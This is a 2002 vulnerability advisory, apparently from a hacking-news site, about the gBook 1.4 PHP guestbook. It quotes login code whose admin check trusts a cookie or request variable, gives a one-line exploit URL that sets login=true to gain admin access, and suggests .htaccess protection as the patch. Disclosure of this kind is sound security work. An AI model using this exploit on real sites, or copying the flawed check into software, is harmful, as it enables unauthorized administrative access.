Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » gBook

gBook

by Nikola Strahija on October 23rd, 2002 Language : PHP, Tested version : 1.4, Problem : Admin access


PHP Code :
같같같같같
/gb/index.php :
------------------------------------------------------
include("config.inc.php");
if($action == "login") {
if($user == $loginu && $pw == $loginpw)
{
setcookie("login", "true", time()+3600);
header("location: index.php");
}
else
{
setcookie("login", "false", -3600);
header("location: index.php?fehler=login");
}
}
?>
[...]
if($login == "true")
{
[ADMIN CODE]
[...]
------------------------------------------------------

Exploit :
같같같같
http://[Target]/gb/index.php?login=true

Patch :
같같같
Using of .htaccess.

More details in french :
http://www.frog-man.org/tutos/gBook.txt
Translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FgBook.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

[email protected]


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »